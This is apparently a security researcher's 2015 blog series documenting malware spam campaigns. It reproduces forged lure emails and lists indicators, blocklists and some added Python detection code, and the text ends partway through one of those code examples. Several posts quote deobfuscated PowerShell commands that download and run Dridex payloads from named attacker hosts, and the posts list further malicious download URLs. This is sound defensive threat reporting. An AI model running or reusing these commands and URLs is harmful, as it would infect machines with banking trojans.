Tuesday, 31 March 2015
Malware spam: "FW: Passport copy" / "salim@humdsolicitors.co.uk"
This fake legal spam comes with a malicious attachment. It appears to be a forwarded message from a solicitor's office, but it is just a simple forgery.
From: salim@humdsolicitors.co.uk
Date: 30 March 2015 at 11:58
Subject: FW: Passport copy
From: Raad Ali [mailto:raaduk@hotmail.com]
Sent: 26 March 2015 08:03
To: salim
Subject: Passport copy
Salam Salim,
Please find attached copy of the passport for my wife and daughter as requested. Please note we need to complete on the purchase in 4 weeks from the agreed date.
Salam
Raad Ali
The attachment is named passport.doc. It is exactly the same malicious payload as the one used in this spam run earlier today, and it drops the Dridex banking trojan on the victim's PC.
Malware spam: "Your PO: SP14619" / "Sam S. [sales@alicorp.com]"
This fake financial spam comes with a malicious attachment:
From: Sam S. [sales@alicorp.com]
Date: 31 March 2015 at 07:45
Subject: Your PO: SP14619
Your PO No: SP14619 for a total of $ 13,607.46
has been sent to New Era Contract Sales Inc. today.
A copy of the document is attached
Regards,
New Era Contract Sales Inc.'s Document Exchange Team
In the sample I have seen, the attachment is APIPO1.doc with a VirusTotal detection rate of 5/56, and it contains this malicious macro [pastebin] which downloads a component from:
http://xianshabuchang.com/54/78.exe
which is saved as %TEMP%\kkaddap7b.exe. This malicious executable has a detection rate of 3/56. Various analysis tools [1] [2] [3] show that it phones home to the following IPs:
91.230.60.219 (Docker Ltd / ArtVisio Ltd, Russia)
185.91.175.39 (Webstyle Group LLC / Rohoster / MnogoByte, Russia)
46.101.38.178 (Digital Ocean, Netherlands)
87.236.215.103 (OneGbits, Lithuania)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
128.199.203.165 (DigitalOcean Cloud, Singapore)
According to the Malwr report it drops another version of itself called edg1.exe [VT 2/56] and what appears to be a Dridex DLL [VT 3/56].
Recommended blocklist:
91.230.60.0/24
185.91.175.0/24
46.101.38.178
87.236.215.103
66.110.179.66
176.108.1.17
202.44.54.5
128.199.203.165
MD5s:
f5ecc500c2b74612e33c0522104fb999
716d1dc7285b017c2dbc146dbb2e319c
2cb0f18ba030c1ab0ed375e4ce9c0342
6218264a6677a37f7e98d8c8bd2c13e9
UPDATE:
A couple of reports from Payload Security [1] [2] also give some insight into the malware, including an additional but well-known IP to block:
95.163.121.178 (Digital Networks CJSC aka DINETHOSTING, Russia)
Wednesday, 25 March 2015
Malware spam: "Invoice ID:12ab34" / "123"
This terse spam has a malicious attachment:
From: Gerry Carpenter
Date: 25 March 2015 at 12:58
Subject: Invoice ID:34bf33
123
There is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has zero detections. Unlike most recent document-based attacks, this does not contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked; the spreadsheet itself is designed to get the victim to click-and-run that object.
Automated analysis doesn't show very much, but it does show the screenshots [1] [2]. I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.221/zxr/ssidin.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; Start-Process %TEMP%\JIOiodfhioIH.exe;
Despite all the mucking about with expanding a CAB file, the downloaded file is actually an EXE file all along, so nothing is done to it. This file has a detection rate of 7/56, and the Payload Security report shows it communicating with the following IPs:
92.63.88.83 (MWTV, Latvia)
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
The payload is most likely Dridex.
Recommended blocklist:
92.63.88.0/24
82.151.131.129
121.50.43.175
MD5s:
ce130212d67070459bb519d67c06a291
461689d449c7b5a905c8404d3a464088
Malware spam: "James Dudley [James.Dudley@hitec.co.uk]" / "Payment 1142"
This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.
From: James Dudley [James.Dudley@hitec.co.uk]
Date: 25 March 2015 at 09:38
Subject: Payment 1142
Payment sheet attached.
James
T 01353 624023
F 01353 624043
Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE
This message has been scanned for viruses and malicious content by Green Duck SpamLab
I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57. It contains this malicious macro [pastebin] which attempts to download a component from:
http://madasi.homepage.t-online.de/dbcfg/32.exe
...which is then saved as %TEMP%\sollken1.2.8.exe; this has a detection rate of 12/57. Automated analysis of this binary is pending, but is so far inconclusive.
Incidentally, the macro contains this snippet:
' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)
All that means is that this Ken Senoo created and freely licensed a Visual Basic module that the bad guys are using. It does not mean that they have anything at all to do with this malware attack.
MD5s:
8f79a24970d9e7063ffcedc9a8d23429
02cfa3e6fdb4301528e5152de76b2abf
UPDATE: this interesting new tool from Payload Security gives some insight as to what the malware does. In particular, it phones home to:
50.31.1.21 (Steadfast Networks, US)
87.236.215.103 (OneGbits, Lithuania)
2.6.14.246 (Orange S.A., France)
14.96.207.127 (Tata Indicom, India)
95.163.121.178 (Digital Networks aka DINETHOSTING, Russia)
Recommended blocklist:
50.31.1.21
87.236.215.103
2.6.14.246
14.96.207.127
95.163.121.0/24
Tuesday, 24 March 2015
Malware spam: "Notice to Appear" / "Notice to appear in Court #0000310657"
These two emails come with a malicious attachment:
From: County Court [lester.hicks@whw0095.whservidor.com]
Date: 24 March 2015 at 16:45
Subject: AERO, Notice to Appear
This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Yours faithfully,
Lester Hicks,
Court Secretary.
-------------
From: District Court [cody.bowman@p3nw8sh177.shr.prod.phx3.secureserver.net]
Date: 24 March 2015 at 16:44
Subject: AERO, Notice to appear in Court #0000310657
Dear Aero,
This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Cody Bowman,
District Clerk.
In these two cases the attachments were named Court_Notification_0000310657.zip and Notice_to_Appear_000283436.zip, containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57] [pastebin] [deobfuscated] and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57] [pastebin] [deobfuscated] respectively.
These scripts attempt to download malicious code from the following sites:
pitfaa.nidhog.com
ilarf.net
gurutravel.co.nz
lawyermyowin.com
www.lead.com.co
Details in the download locations vary, but are in the format:
ilarf.net/document.php?rnd=1161&id=
gurutravel.co.nz/document.php?rnd=3022&id=
This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57 and 4/56. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything.
The executable that seems to do something POSTs to a Turkish server at 176.53.125.25 (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports [1] [2] [3] [4] [5] [6] indicate badness on at least the following IPs:
176.53.125.20
176.53.125.21
176.53.125.22
176.53.125.23
176.53.125.24
176.53.125.25
I would suggest blocking at least those IPs, or perhaps 176.53.125.16/28, or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block 176.53.125.16/24.
I am not 100% certain of the payload; however, some servers in that cluster have been fingered for serving the Trapwot fake anti-virus software.
MD5s:
2d65371ac458c7d11090aca73566e3d4
da63f87243a971edca7ecd214e6fdeb1
77d8670f80c3c1de81fb2a1bf05a84b5
d48ef4bb0549a67083017169169ef3ee
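The two court-notice attachments above share one trick: a ZIP whose only member is a script named `.doc.js`, so a user with hidden extensions sees a document. As an added example (not code from the original post), this Python walks the member names of a ZIP attachment held in memory and flags executable content, including the document-then-script double extension; the archive is constructed here with placeholder contents, not the real sample.

```python
"""Flag archive attachments whose members hide a script behind a document name.

Added example, not from the original post. The two court-notice spams above
delivered ZIPs whose only member was a .doc.js file; Windows hides the final
extension by default, so the victim sees a document. This walks every member
name of a ZIP held in memory. The archive is constructed here with placeholder
contents; no real sample is involved.
"""
from __future__ import annotations

import io
import zipfile

# Extensions that execute when double-clicked and have no business in an invoice.
_EXECUTABLE_EXT = {"js", "jse", "vbs", "vbe", "wsf", "exe", "scr", "bat", "cmd", "ps1", "hta"}
# Extensions a user is conditioned to treat as harmless paperwork.
_DOCUMENT_EXT = {"doc", "docx", "xls", "xlsx", "pdf", "rtf", "txt"}


def classify_member(name: str) -> str | None:
    """Return why a member name is dangerous, or None if it is not."""
    parts = name.rsplit("/", 1)[-1].lower().split(".")
    if len(parts) < 2:
        return None  # no extension at all
    last = parts[-1]
    if last not in _EXECUTABLE_EXT:
        return None
    if len(parts) >= 3 and parts[-2] in _DOCUMENT_EXT:
        return f"double extension: shown as .{parts[-2]}, runs as .{last}"
    return f"executable content: .{last}"


def scan_zip_attachment(data: bytes) -> list[tuple[str, str]]:
    """(member, reason) for every dangerous member of a ZIP given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            reason = classify_member(info.filename)
            if reason:
                findings.append((info.filename, reason))
    return findings


def build_sample_zip() -> bytes:
    """Constructed stand-in for Court_Notification_0000310657.zip (placeholder contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("Court_Notification_0000310657.doc.js", "// placeholder, not the real script\n")
        archive.writestr("Notice_to_Appear_000283436.pdf", "%PDF placeholder\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in scan_zip_attachment(build_sample_zip()):
        print(f"{member}: {reason}")
```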
Labels: Fake Anti-Virus, Malware, Spam, Turkey, Viruses
Malware spam: "Mary Watkins [mary@elydesigngroup.co.uk]" / "Invoice"
This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicious attachment.
From: Mary Watkins [mary@elydesigngroup.co.uk]
Date: 24 March 2015 at 07:23
Subject: Invoice
Hi,
As promised!
--
Mary Watkins
Office Manager
Ely Design Group
Attached is a Word document named S22C-6e15031710060.doc, which has a low detection rate of 2/57 and contains this malicious macro [pastebin], which in turn downloads a component from the following location:
http://dogordie.de/js/bin.exe
The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57.
Automated analysis tools [1] [2] [3] [4] [5] indicate that the binary crashes in those test environments, although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan.
Friday, 20 March 2015
Something evil on 85.143.216.102 and 94.242.205.101
I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].
Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:
For practical purposes though I recommend you block traffic to the IPs rather than the domains.
Recommended blocklist:
85.143.216.102
94.242.205.101
UPDATE:
The following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98
Labels: Evil Network, Luxembourg, GoDaddy, Russia
Thursday, 19 March 2015
Malware spam: "Invoice ID:987654321 in attachment." from random senders
This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:
Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.
Sample senders:
Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover
The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.
Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment
This spam has a malicious attachment.
Date: 19 March 2015 at 12:52
Subject: Aspiring Solicitors Debt Collection
Aspiring Solicitors
Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance: 2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.
You are required to pay the balance of GBP 2,345.00 in full within 7 (seven) days from the date of this email to avoid County Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.
Court Fees GBP 245.00
Solicitors Costs GBP 750.00
Cheques or Postal Orders should be made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card. If you wish to make a payment in this way, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non-payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.
Yours faithfully,
Shawn Ballard
Aspiring Solicitors
Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indications are that this can run even with macros disabled. Each attachment has a unique MD5.
Analysis is currently pending; this appears to use several new techniques to avoid detection. According to this Twitter conversation, one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe, although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.
IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signatures available soon, so I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that infected machines are not used for financial transactions.
UPDATE:
This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:
There's some interesting metadata: created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".
In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.
A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
FYI, those IPs are allocated as follows:
193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)
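The four command lines above, and the one in the "Invoice ID:34bf33" post earlier on this page, have the same shape: fetch a file into %TEMP% under a .cab name, run expand on it, then start the result. As an added example (not code from the original post), this Python inspects process-creation command lines for that chain and explains what it found; the sample events are constructed and their hosts are RFC 5737 documentation addresses, not the download servers named here.

```python
"""Detect the 'download as .cab, expand, run' PowerShell one-liner in process logs.

Added example (not from the original post). It takes command lines as they appear
in process-creation telemetry (Sysmon Event ID 1, or Windows 4688 with command-line
auditing enabled) and pulls apart the chain quoted above: WebClient.DownloadFile
to a file named .cab, expand.exe on that file, then Start-Process/start on the
result. The sample command lines are constructed and use RFC 5737 documentation
addresses rather than the download servers named in the posts.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Switches that suppress the normal guard rails; matched case-insensitively.
_EVASION_FLAGS = {
    r"-executionpolicy\s+bypass": "ExecutionPolicy Bypass",
    r"-noprofile\b": "NoProfile",
    r"-windowstyle\s+hidden": "WindowStyle Hidden",
}
_DOWNLOAD_RE = re.compile(
    r"\.DownloadFile\(\s*'(?P<url>https?://[^']+)'\s*,\s*'(?P<dst>[^']+)'\s*\)",
    re.IGNORECASE,
)
_EXPAND_RE = re.compile(r"\bexpand\s+(?P<src>[^\s;]+)\s+(?P<dst>[^\s;]+)", re.IGNORECASE)
_EXEC_RE = re.compile(r"\b(?:start-process|start)\s+(?P<target>[^\s;]+)", re.IGNORECASE)


@dataclass
class Verdict:
    suspicious: bool = False
    download_url: str | None = None
    dropped_paths: list[str] = field(default_factory=list)
    reasons: list[str] = field(default_factory=list)


def analyse_command_line(cmd: str) -> Verdict:
    """Explain why a PowerShell command line matches the downloader pattern."""
    v = Verdict()
    if "powershell" not in cmd.lower():
        return v
    for pattern, label in _EVASION_FLAGS.items():
        if re.search(pattern, cmd, re.IGNORECASE):
            v.reasons.append(f"launched with {label}")
    dl = _DOWNLOAD_RE.search(cmd)
    if dl:
        v.download_url = dl.group("url")
        v.dropped_paths.append(dl.group("dst"))
        v.reasons.append("WebClient.DownloadFile writes to " + dl.group("dst"))
        if dl.group("dst").lower().endswith(".cab"):
            v.reasons.append("download disguised with a .cab extension")
    ex = _EXPAND_RE.search(cmd)
    if ex and ex.group("src") in v.dropped_paths:
        v.dropped_paths.append(ex.group("dst"))
        v.reasons.append("expand turns the download into " + ex.group("dst"))
    run = _EXEC_RE.search(cmd)
    runs_dropped = bool(run) and run.group("target") in v.dropped_paths
    if runs_dropped:
        v.reasons.append("the dropped file is executed in the same command")
    # Fetching a file and running it from one command line is the whole chain.
    v.suspicious = bool(dl) and runs_dropped
    return v


def is_decoy_cab(data: bytes) -> bool:
    """True when a file written as .cab is really a PE image: 'MZ', not 'MSCF'."""
    return data[:4] != b"MSCF" and data[:2] == b"MZ"


# Constructed process-creation command lines; index 0 is benign administration.
SAMPLE_EVENTS = [
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\alice\Documents",
    r"cmd /K powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden "
    r"(New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/zxr/ssidin.exe',"
    r"'%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; "
    r"Start-Process %TEMP%\JIOiodfhioIH.exe;",
    r"cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
    r"(New-Object System.Net.WebClient).DownloadFile('http://198.51.100.7/smoozy/shake.exe',"
    r"'%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; "
    r"start %TEMP%\JIOiodfhioIH.exe;",
]


def scan_events(events: list[str]) -> list[int]:
    """Indices of events whose command line matches the full download-and-run chain."""
    return [i for i, cmd in enumerate(events) if analyse_command_line(cmd).suspicious]


if __name__ == "__main__":
    for i in scan_events(SAMPLE_EVENTS):
        v = analyse_command_line(SAMPLE_EVENTS[i])
        print(f"event {i}: {v.download_url} -> {v.dropped_paths}")
        for reason in v.reasons:
            print("   ", reason)
```

On the file itself, `is_decoy_cab` is the check the post's remark implies: the "CAB" never expands because it was a PE image from the start.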
"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)
Further analysis is pending.
Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212
Malware spam: "sales@marflow.co.uk" / "Your Sales Order"
This spam run pretends to come from Marflow Engineering but it doesn't, instead it is a simple forgery. Marflow are not sending out this email, nor have their systems been compromised in any way.
From: sales@marflow.co.uk
Date: 19 March 2015 at 09:13
Subject: Your Sales Order
Your order acknowledgment is attached.
Please check carefully and advise us of any issues.
Best regards
Marflow
Attached is a file 611866.xls which appears to come in at least three different versions. But due to an error in the way the spam has been created, the attachment is actually corrupt and (depending on your version of Excel) attempting to open it gives this error:
The file you are trying to open, '611866.xls', is in a different format than specified by the file extension. Verify that the file is not corrupted and is from a trusted source before opening the file. Do you want to open the file now?
Clicking OK loads up what looks like gobbledegook.
If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:
http://www.lenhausen.de/js/bin.exe
http://meostore.net/js/bin.exe
http://mvw1919.de/js/bin.exe
This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and, according to the Malwr report, it phones home to the following IPs:
37.139.47.81 (Pirix, Russia)
5.100.249.215 (OMC Computers & Communications, Israel)
195.162.107.7 (Gamma Telecom, UK)
131.111.37.221 (University of Cambridge, UK)
198.245.70.182 (Deniz Toprak, Turkey / B2 Net Solutions, US)
210.205.74.43 (DAEMINCUSTOM, Korea)
46.228.193.201 (Aqua Networks Ltd, Germany)
It also drops another version of the downloader, edg1.exe, which has a detection rate of 1/56, and a DLL with a detection rate of 1/57. The payload is the Dridex banking trojan.
Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201
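The Base 64 mishap in this post is worth turning into a gateway check: an attachment whose bytes are not the container its extension promises, and which decodes to a macro-capable workbook. As an added example (not code from the original post), this Python tests whether an attachment body is Base64 text, decodes it and names the real container from its magic bytes; the sample attachment is a constructed OLE2 header plus padding, not the real document.

```python
"""Triage an attachment that ships as Base64 text where Excel expected a workbook.

Added example, not from the original post. The '611866.xls' attachment was the
Base64 encoding of a legacy .xls; Excel's "different format than specified by the
file extension" warning was the only thing standing between the user and the
macro. This helper checks whether the bytes match the claimed extension and, if
they are Base64 text, decodes them and identifies the real container. The sample
attachment is a constructed OLE2 header plus padding, not a real document.
"""
from __future__ import annotations

import base64
import binascii
import re

# (magic prefix, container label) for the formats seen in these spam runs.
_MAGIC = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (legacy .doc/.xls, can carry VBA)"),
    (b"PK\x03\x04", "ZIP container (OOXML document or archive)"),
    (b"MSCF", "Microsoft cabinet archive"),
    (b"MZ", "Windows PE executable"),
    (b"<?xml", "XML text (e.g. Word 2003 XML with an embedded object)"),
]
# Container label prefix a given extension should have.
_EXPECTED = {"xls": "OLE2", "doc": "OLE2", "xlsx": "ZIP", "docx": "ZIP", "zip": "ZIP"}
_B64_RE = re.compile(rb"\A[A-Za-z0-9+/=\r\n]+\Z")


def identify_container(data: bytes) -> str:
    """Name the container by leading magic bytes, or 'unknown'."""
    for magic, label in _MAGIC:
        if data.startswith(magic):
            return label
    return "unknown"


def looks_like_base64(data: bytes) -> bool:
    """Base64 text: only the Base64 alphabet plus line breaks, in 4-char groups."""
    body = data.replace(b"\r", b"").replace(b"\n", b"")
    return len(body) >= 16 and len(body) % 4 == 0 and _B64_RE.match(data) is not None


def extension_matches(name: str, container: str) -> bool:
    """False when the extension promises a container the bytes do not deliver."""
    expected = _EXPECTED.get(name.rsplit(".", 1)[-1].lower())
    return expected is None or container.startswith(expected)


def triage_attachment(name: str, data: bytes) -> dict:
    """Report the claimed type, the actual container, and any Base64-wrapped payload."""
    container = identify_container(data)
    report = {
        "name": name,
        "container": container,
        "extension_ok": extension_matches(name, container),
        "base64_wrapped": False,
        "decoded_container": None,
    }
    if container == "unknown" and looks_like_base64(data):
        try:
            decoded = base64.b64decode(data)  # non-alphabet bytes (line breaks) are dropped
        except binascii.Error:
            return report
        report["base64_wrapped"] = True
        report["decoded_container"] = identify_container(decoded)
    return report


# Constructed stand-in for the attachment: an OLE2 header followed by padding.
SAMPLE_XLS = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504
# What the spam actually delivered: the same bytes, Base64-encoded with line breaks.
SAMPLE_ATTACHMENT = base64.encodebytes(SAMPLE_XLS)

if __name__ == "__main__":
    for label, blob in (("as sent", SAMPLE_ATTACHMENT), ("after decoding", SAMPLE_XLS)):
        print(label, triage_attachment("611866.xls", blob))
```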
Wednesday, 18 March 2015
Malware spam: "JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]" / "FW: Customer account docs"
From: JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]
Date: 18 March 2015 at 17:49
Subject: FW: Customer account docs
As it happens, Carrie L Tolstedt is a real executive... at Wells Fargo. The lady in the picture is another Wells Fargo employee entirely.
But anyway, this is a simple forgery containing a link to a file at Cubby which downloads as Documents_JP3922PV8.zip and contains a malicious file Documents_JP3922PV8.exe, which has an icon to make it look like an Adobe Acrobat file.
The executable has a low VirusTotal detection rate of 3/57. Various automated analysis tools [1] [2] [3] [4] show the malware downloading additional components from:
bej-it-solutions.com/pvt/ixusn.rtf
capslik.com/mandoc/ixusn.rtf
It then attempts to POST data to an IP at 109.230.131.95 (Vsevnet Ltd, Russia), which is a critical IP to block if you want to protect yourself against this type of Upatre / Dyre attack.
The Malwr report also shows that amongst other things it downloads an executable lwxzqrk36.exe which has a detection rate of just 2/57. That Malwr report also shows that it downloads and pops up a PDF about drone strikes.
[Image: Source: malwr.com]
The download locations for this Upatre/Dyre combination change all the time, but the IP address 109.230.131.95 has been around for a little while. Also, it is a characteristic of this malware that it calls out to checkip.dyndns.org to determine the client IP address; monitoring for traffic going to that location can be a useful indicator of infection.
Malware spam: "Your online Gateway.gov.uk Submission"
This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.
From: Gateway.gov.uk
Date: 18 March 2015 at 13:19
Subject: Your online Gateway.gov.uk Submission
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/file/s/gdvzk7toum8ghnc/SecureDocument.zip?dl=1
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov.uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
The link leads to an archive file Avis_De_Paiement.zip which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:
canabrake.com.mx/css/doc11.rtf
straphael.org.uk/youth2000_files/doc11.rtf
My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.
Malware spam: "December unpaid invoice notification"
This spam comes with no body text, but does come with a malicious attachment.
From: Korey Mack
Date: 18 March 2015 at 11:04
Subject: December unpaid invoice notification
So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.
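Added example, not part of the original post: Python that flags the download-then-EXPAND-then-start chain in process command lines like the one above, and checks whether a file saved as .cab is really a CAB (MSCF header) or already a PE (MZ header), which is the quirk noted above. The first sample command line is the one from the post; the second command line and the file bytes are constructed.

```python
import re

# Sample process-creation command lines. The first is the command from the
# post above; the second is a constructed benign line for contrast.
SAMPLE_CMDLINES = [
    "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
    "(New-Object System.Net.WebClient).DownloadFile("
    "'http://176.31.28.244/smoozy/shake.exe','%TEMP%\\huiUGI8t8dsF.cab'); "
    "expand %TEMP%\\huiUGI8t8dsF.cab %TEMP%\\huiUGI8t8dsF.exe; "
    "start %TEMP%\\huiUGI8t8dsF.exe;",
    "powershell.exe -noprofile -File C:\\Scripts\\inventory.ps1",
]

BYPASS_RE = re.compile(r"-ExecutionPolicy\s+bypass", re.I)
DOWNLOAD_RE = re.compile(
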